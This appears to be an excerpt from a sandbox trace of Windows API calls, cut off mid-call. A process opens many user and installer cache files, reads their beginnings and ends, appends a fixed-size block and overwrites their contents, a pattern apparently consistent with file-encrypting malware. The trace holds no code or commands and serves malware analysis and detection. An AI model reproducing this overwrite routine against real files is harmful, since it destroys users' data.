WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.724] ReleaseMutex (hMutex=0x168) returned 1 [0156.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0156.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_STD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0156.724] ReadFile (in: hFile=0x1d4, lpBuffer=0x26a9268, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a9268*, lpNumberOfBytesRead=0x331f2bc*=0x15e, lpOverlapped=0x0) returned 1 [0156.725] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0156.725] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6e6, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x331f2d0*=0x6e6, lpOverlapped=0x0) returned 1 [0156.726] CloseHandle (hObject=0x1d4) returned 1 [0158.797] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.798] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.798] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xf36be [0158.798] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.798] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.798] ReleaseMutex (hMutex=0x168) returned 1 [0158.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.798] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.801] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.802] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf26be [0158.802] ReadFile (in: hFile=0x1dc, lpBuffer=0x2891678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2891678*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.804] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf26be [0158.804] WriteFile (in: hFile=0x1dc, lpBuffer=0x289a838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289a838*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.804] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0158.805] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.805] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0158.805] CloseHandle (hObject=0x1dc) returned 1 [0158.805] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.807] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.807] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x13babb [0158.808] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.808] ReleaseMutex (hMutex=0x168) returned 1 [0158.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.808] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.810] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.811] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13aabb [0158.811] ReadFile (in: hFile=0x1dc, lpBuffer=0x2891678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2891678*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.813] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13aabb [0158.814] WriteFile (in: hFile=0x1dc, lpBuffer=0x289a838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289a838*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.815] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0158.815] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.816] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0158.816] CloseHandle (hObject=0x1dc) returned 1 [0158.816] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.817] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.817] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xfc90a [0158.817] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.817] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.818] ReleaseMutex (hMutex=0x168) returned 1 [0158.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.818] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.820] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.821] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xfb90a [0158.821] ReadFile (in: hFile=0x1dc, lpBuffer=0x28505c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x28505c8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.822] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xfb90a [0158.823] WriteFile (in: hFile=0x1dc, lpBuffer=0x28505c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28505c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.823] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0158.823] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839408*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.824] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839408*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0158.824] CloseHandle (hObject=0x1dc) returned 1 [0158.824] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.825] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.825] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc5b25 [0158.825] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.825] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.825] ReleaseMutex (hMutex=0x168) returned 1 [0158.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.826] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.828] ReadFile (in: hFile=0x1dc, lpBuffer=0x2839408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.828] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xc4b25 [0158.829] ReadFile (in: hFile=0x1dc, lpBuffer=0x2891678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2891678*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.830] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xc4b25 [0158.830] WriteFile (in: hFile=0x1dc, lpBuffer=0x289a838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289a838*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.831] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0158.831] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.832] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0158.832] CloseHandle (hObject=0x1dc) returned 1 [0158.832] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.833] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.833] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2fe [0158.833] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.834] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.834] ReleaseMutex (hMutex=0x168) returned 1 [0158.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0158.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0158.834] ReadFile (in: hFile=0x1dc, lpBuffer=0x2891698, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2891698*, lpNumberOfBytesRead=0x331f2bc*=0x2fe, lpOverlapped=0x0) returned 1 [0158.837] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0158.837] WriteFile (in: hFile=0x1dc, lpBuffer=0x28977f8*, nNumberOfBytesToWrite=0x886, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28977f8*, lpNumberOfBytesWritten=0x331f2d0*=0x886, lpOverlapped=0x0) returned 1 [0158.837] CloseHandle (hObject=0x1dc) returned 1 [0158.837] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.838] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.838] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xcfc4 [0158.838] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0158.838] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.838] ReleaseMutex (hMutex=0x168) returned 1 [0158.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroFnt10.lst", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroFnt10.lst", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AcroFnt10.lst", lpUsedDefaultChar=0x0) returned 13 [0158.839] ReadFile (in: hFile=0x1dc, lpBuffer=0x2891678, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2891678*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0159.361] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbfc4 [0159.363] ReadFile (in: hFile=0x1dc, lpBuffer=0x280c638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x280c638*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.390] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbfc4 [0159.391] WriteFile (in: hFile=0x1dc, lpBuffer=0x2850598*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2850598*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0159.392] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0159.392] WriteFile (in: hFile=0x1dc, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0159.392] CloseHandle (hObject=0x1dc) returned 1 [0159.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.396] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.396] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x42d0 [0159.396] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.396] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.396] ReleaseMutex (hMutex=0x168) returned 1 [0159.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap.exe.cdf-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0159.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap.exe.cdf-ms", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clickonce_bootstrap.exe.cdf-ms", lpUsedDefaultChar=0x0) returned 30 [0159.397] ReadFile (in: hFile=0x1dc, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.399] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x32d0 [0159.399] ReadFile (in: hFile=0x1dc, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.401] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x32d0 [0159.401] WriteFile (in: hFile=0x1dc, 